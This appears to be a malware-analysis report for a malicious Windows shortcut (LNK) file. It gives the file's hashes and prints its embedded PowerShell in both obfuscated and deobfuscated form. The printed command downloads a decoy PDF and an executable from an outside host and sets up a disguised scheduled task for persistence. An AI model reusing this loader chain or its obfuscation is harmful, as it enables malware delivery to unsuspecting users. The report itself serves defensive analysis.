8930abf86e2e94b1a4b373e25d01f2ff

LNK File
|
MD5: 8930abf86e2e94b1a4b373e25d01f2ff
|
Size: 2.55 KB
|
application/x-ms-shortcut

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	8930abf86e2e94b1a4b373e25d01f2ff
Sha1	3a83ba1264291493a8fa39b4d343c0e1ee271974
Sha256	4466995be863ec4405fc053296cfe74d0098f94e61aa89c95fa2cc80c8ad6cb9
Sha384	f94877f5797b14efc11614c949a28e39ea8b22f34cd21e8101d3999ba2b29664757075ba6dfb35861749470b2dccfb58
Sha512	ebe5c0d7152ce8ed35e6a71c6436c0a1fbb929def0c417334136f69f86b1dfce002e906f7fce5e92e6ad9bc85fbde5a919c29600def19ec35f7980876ccb2faa
SSDeep	48:8jBhv72LXXOrcOqhaMmOqhukesqAqL5dqoB6rHXv3QiYcs6N0:8jBdSLXOgdaMmdGcEQv9YbM
TLSH	4151CE182AE11624F3F24B7954BB55C08D3ABD5EFE318E9C4291D54C0861A1AFC72F2F

File Structure

Artefacts

Name0	Value
LNK: Command Execution	conhost.exe powershell $ProgressPreference = 'SilentlyContinue';$b='C:\Users';iw''r https://jlu-edu.org/download/fetch/list1/18803/view/66e1c460-e71e-4dac-a35a-f2529b20e271 -OutFile $b\Public\89565254.pdf;s''a''p''s $b\Public\89565254.pdf;iw''r https://jlu-edu.org/download/fetch/list1/10884/view/fe35dfdc-e78f-4479-a142-3df61d6cbe6f -OutFile "$b\Public\hip";r''e''n -Path "$b\Public\hip" -NewName "$b\Public\Winver.exe";c''p''i "$b\Public\89565254.pdf" -destination .;sch''ta''s''ks /c''r''e''a''te /S''c minute /''t''n'' GoogleErrorReport /t''r "$b\Public\Winver" /f;e''r''a''s''e *d?.?n?
Deobfuscated PowerShell	$ProgressPreference = "SilentlyContinue" $b = "C:\Users" Invoke-WebRequest "https://jlu-edu.org/download/fetch/list1/18803/view/66e1c460-e71e-4dac-a35a-f2529b20e271" -OutFile $b\Public\89565254.pdf saps $b\Public\89565254.pdf Invoke-WebRequest "https://jlu-edu.org/download/fetch/list1/10884/view/fe35dfdc-e78f-4479-a142-3df61d6cbe6f" -OutFile "$b\Public\hip" ren -Path "$b\Public\hip" -NewName "$b\Public\Winver.exe" cpi "$b\Public\89565254.pdf" -destination "." schtasks "/create" "/Sc" "minute" "/tn" "GoogleErrorReport" "/tr" "$b\Public\Winver" "/f" Remove-Item "*d?.?n?"

Name0

Value

LNK: Command Execution

Deobfuscated PowerShell

8930abf86e2e94b1a4b373e25d01f2ff (2.55 KB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
LNK: Command Execution	conhost.exe powershell $ProgressPreference = 'SilentlyContinue';$b='C:\Users';iw''r https://jlu-edu.org/download/fetch/list1/18803/view/66e1c460-e71e-4dac-a35a-f2529b20e271 -OutFile $b\Public\89565254.pdf;s''a''p''s $b\Public\89565254.pdf;iw''r https://jlu-edu.org/download/fetch/list1/10884/view/fe35dfdc-e78f-4479-a142-3df61d6cbe6f -OutFile "$b\Public\hip";r''e''n -Path "$b\Public\hip" -NewName "$b\Public\Winver.exe";c''p''i "$b\Public\89565254.pdf" -destination .;sch''ta''s''ks /c''r''e''a''te /S''c minute /''t''n'' GoogleErrorReport /t''r "$b\Public\Winver" /f;e''r''a''s''e *d?.?n? Malicious	8930abf86e2e94b1a4b373e25d01f2ff
Deobfuscated PowerShell	$ProgressPreference = "SilentlyContinue" $b = "C:\Users" Invoke-WebRequest "https://jlu-edu.org/download/fetch/list1/18803/view/66e1c460-e71e-4dac-a35a-f2529b20e271" -OutFile $b\Public\89565254.pdf saps $b\Public\89565254.pdf Invoke-WebRequest "https://jlu-edu.org/download/fetch/list1/10884/view/fe35dfdc-e78f-4479-a142-3df61d6cbe6f" -OutFile "$b\Public\hip" ren -Path "$b\Public\hip" -NewName "$b\Public\Winver.exe" cpi "$b\Public\89565254.pdf" -destination "." schtasks "/create" "/Sc" "minute" "/tn" "GoogleErrorReport" "/tr" "$b\Public\Winver" "/f" Remove-Item "*d?.?n?" Malicious	8930abf86e2e94b1a4b373e25d01f2ff > LNK CommandLine > [PowerShell Command]

You must be signed in to post a comment.